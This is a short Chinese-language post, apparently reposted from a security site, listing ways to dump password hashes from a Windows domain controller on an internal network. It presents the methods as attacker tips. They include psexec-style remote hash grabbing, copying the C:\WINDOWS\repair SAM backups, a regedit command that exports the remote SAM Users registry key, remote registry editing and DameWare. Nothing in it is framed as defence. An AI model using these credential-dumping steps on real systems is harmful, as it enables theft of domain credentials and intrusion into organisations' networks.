内网导出域控制器的Hash列表

因为域控制器一般设置严格,用类似的远程执行工具在执行命令时,往往不会成功,会提示类似not write memory的错误这时,我们就要用到其它的方法来获取Hash了。

1.用psexec类似远程执行工具,直接抓远程hash 2.copy C:\WINDOWS\repair
3.regedit \\ip /e d:\aa.reg /S “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users”

4.用windows系统自带的,Gui 界面方式,远程操作注册表。
5.远程管理工具
DameWare Mini Remote Control

本文摘自冷月渡云由网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理.